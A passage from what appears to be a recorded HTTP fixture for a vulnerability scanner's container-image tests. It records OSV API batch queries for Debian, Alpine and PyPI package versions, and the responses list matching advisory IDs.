"ecosystem": "Debian:10", "name": "xz-utils" }, "version": "5.2.4-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "p11-kit" }, "version": "0.23.15-2+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", 
"name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pcre3" }, "version": "2:8.39-12" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "Debian:10", "name": "libseccomp" }, "version": "2.3.3-4" }, { "package": { "ecosystem": "Debian:10", "name": "libselinux" }, "version": "2.8-1+b1" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsepol" }, "version": "2.8-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "sqlite3" }, "version": "3.27.2-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libtasn1-6" }, "version": "4.13-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libunistring" }, "version": "0.9.10-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libzstd" }, "version": "1.3.8+dfsg-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian:10", 
"name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "netbase" }, "version": "5.6" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "perl" }, "version": "5.28.1-6+deb10u1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "Debian:10", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "Debian:10", "name": "sysvinit" }, "version": "2.93-8" }, { "package": { "ecosystem": "Debian:10", "name": "tar" }, "version": "1.30+dfsg-6" }, { "package": { "ecosystem": "Debian:10", "name": "tzdata" }, "version": "2021a-0+deb10u11" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "PyPI", "name": "wheel" }, "version": "0.40.0" }, { "package": { "ecosystem": "Debian:10", "name": "zlib" }, "version": "1:1.2.11.dfsg-1+deb10u2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Scanning_python_image_with_no_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 3752 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": 
"2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3783-1", "modified": "2026-03-09T01:21:52.762023Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3660-1", "modified": "2026-03-09T02:10:14.556560Z" }, { "id": "DLA-3740-1", "modified": "2026-03-09T01:23:17.775568Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": 
"2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, {}, { "vulns": [ { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" 
} ] }, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "GHSA-8rrh-rw8j-w5fx", "modified": "2026-02-04T03:06:55.268134Z" } ] }, {} ] } headers: Content-Length: - "3752" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14537 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "0.12.2" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.4" }, { "package": { "ecosystem": "Debian:10", "name": "adduser" }, "version": "3.118" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "base-files" }, "version": "10.3+deb10u13" }, { "package": { "ecosystem": "Debian:10", "name": "base-passwd" }, "version": "3.5.46" }, { "package": { "ecosystem": "Debian:10", "name": "bash" }, "version": "5.0-4" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "1:2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ca-certificates" }, "version": "20200601~deb10u2" }, { "package": { "ecosystem": "PyPI", "name": "certifi" }, "version": "2025.11.12" }, { "package": { "ecosystem": "PyPI", "name": "chardet" }, "version": "3.0.4" }, { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.1.8" }, { "package": { "ecosystem": "Debian:10", "name": "coreutils" }, "version": "8.30-3" }, { "package": { "ecosystem": "Debian:10", "name": "dash" }, "version": "0.5.10.2-5" }, { "package": { "ecosystem": "Debian:10", "name": "debconf" }, "version": "1.5.71+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": 
"debian-archive-keyring" }, "version": "2019.1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debianutils" }, "version": "4.8.6.1" }, { "package": { "ecosystem": "Debian:10", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Debian:10", "name": "dpkg" }, "version": "1.19.8" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "findutils" }, "version": "4.6.0+git+20190209-2" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "gnupg2" }, "version": "2.2.12-1+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "grep" }, "version": "3.3-1" }, { "package": { "ecosystem": "Debian:10", "name": "gzip" }, "version": "1.9-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "hostname" }, "version": "3.21" }, { "package": { "ecosystem": "PyPI", "name": "idna" }, "version": "2.7" }, { "package": { "ecosystem": "Debian:10", "name": "init-system-helpers" }, "version": "1.56+nmu1" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "Debian:10", "name": "acl" }, "version": "2.2.53-4" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "attr" }, "version": "1:2.4.48-4" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "bzip2" }, "version": "1.0.6-9.2~deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, 
{ "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "libcap-ng" }, "version": "0.7.9-2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.5" }, { "package": { "ecosystem": "Debian:10", "name": "cdebconf" }, "version": "0.249" }, { "package": { "ecosystem": "Debian:10", "name": "expat" }, "version": "2.2.6-2+deb10u6" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libffi" }, "version": "3.2.1-9" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "1:8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "libgcrypt20" }, "version": "1.8.4-5+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gdbm" }, "version": "1.18.1-4" }, { "package": { "ecosystem": "Debian:10", "name": "gmp" }, "version": "2:6.1.2+dfsg-4+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gnutls28" }, "version": "3.6.7-4+deb10u10" }, { "package": { "ecosystem": "Debian:10", "name": "libgpg-error" }, "version": "1.35-1" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "libidn2" }, "version": "2.0.5-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "lz4" }, "version": "1.8.3-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "xz-utils" }, "version": "5.2.4-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, 
"version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "p11-kit" }, "version": "0.23.15-2+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pcre3" }, "version": "2:8.39-12" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "Debian:10", "name": "libseccomp" }, "version": "2.3.3-4" }, { "package": { "ecosystem": "Debian:10", "name": "libselinux" }, "version": "2.8-1+b1" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsepol" }, "version": "2.8-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "sqlite3" }, "version": "3.27.2-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libtasn1-6" }, "version": "4.13-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libunistring" }, "version": "0.9.10-1" 
}, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libzstd" }, "version": "1.3.8+dfsg-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "netbase" }, "version": "5.6" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "perl" }, "version": "5.28.1-6+deb10u1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pytz" }, "version": "2025.2" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "Debian:10", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "Debian:10", "name": "sysvinit" }, "version": "2.93-8" }, { "package": { "ecosystem": "Debian:10", "name": "tar" }, "version": "1.30+dfsg-6" }, { "package": { "ecosystem": "Debian:10", "name": "tzdata" }, "version": "2021a-0+deb10u11" }, { "package": { "ecosystem": "PyPI", "name": "urllib3" }, "version": 
"1.24.3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "PyPI", "name": "wheel" }, "version": "0.40.0" }, { "package": { "ecosystem": "Debian:10", "name": "zlib" }, "version": "1:1.2.11.dfsg-1+deb10u2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Scanning_python_image_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 6240 body: | { "results": [ { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-562c-5r94-xh97", "modified": "2025-02-21T05:29:40.872529Z" }, { "id": "GHSA-5wv5-4vpf-pj6m", "modified": "2024-09-20T21:24:25.140560Z" }, { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2018-66", "modified": "2023-11-08T03:59:39.887416Z" }, { "id": "PYSEC-2019-179", "modified": "2023-11-08T04:00:40.602062Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-29vq-49wr-vm6x", "modified": "2026-02-23T23:43:27.690386Z" }, { "id": "GHSA-87hc-h4r5-73f7", "modified": "2026-02-04T03:18:07.993642Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": 
"2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-jjg7-2v4v-x38h", "modified": "2026-02-04T03:49:45.087439Z" }, { "id": "PYSEC-2024-60", "modified": "2024-07-11T17:42:33.704488Z" } ] }, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3783-1", "modified": "2026-03-09T01:21:52.762023Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3660-1", "modified": "2026-03-09T02:10:14.556560Z" }, { "id": "DLA-3740-1", "modified": "2026-03-09T01:23:17.775568Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, 
{}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, {}, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": 
"2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, {}, { "vulns": [ { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" } ] }, { "vulns": [ { "id": "GHSA-2xpw-w6gg-jr37", "modified": "2026-02-04T02:36:12.983430Z" }, { "id": "GHSA-34jh-p97f-mpxf", "modified": "2026-02-04T03:37:44.850742Z" }, { "id": "GHSA-38jv-5279-wg99", "modified": "2026-02-04T03:51:36.162029Z" }, { "id": "GHSA-g4mx-q9vg-27p4", "modified": "2026-02-04T03:30:16.767903Z" }, { "id": "GHSA-gm62-xv2j-4w53", "modified": "2026-02-04T03:37:15.919661Z" }, { "id": "GHSA-pq67-6m6q-mj2v", "modified": "2026-02-04T04:38:01.163387Z" }, { "id": "GHSA-v845-jxx5-vc9f", "modified": "2026-02-04T02:58:30.152562Z" }, { "id": "GHSA-wqvq-5m8c-6g24", "modified": "2024-11-18T22:47:07.792720Z" }, { "id": "PYSEC-2020-148", "modified": "2023-11-08T04:03:14.251187Z" }, { "id": "PYSEC-2021-108", "modified": "2023-11-08T04:06:04.829992Z" }, { "id": "PYSEC-2023-192", "modified": "2023-11-08T04:13:33.452167Z" }, { "id": "PYSEC-2023-212", "modified": "2023-11-08T04:13:39.165450Z" } ] }, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "GHSA-8rrh-rw8j-w5fx", "modified": "2026-02-04T03:06:55.268134Z" } ] }, {} ] } headers: Content-Length: - "6240" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 4149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-baselayout" }, "version": "3.6.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-baselayout" }, "version": 
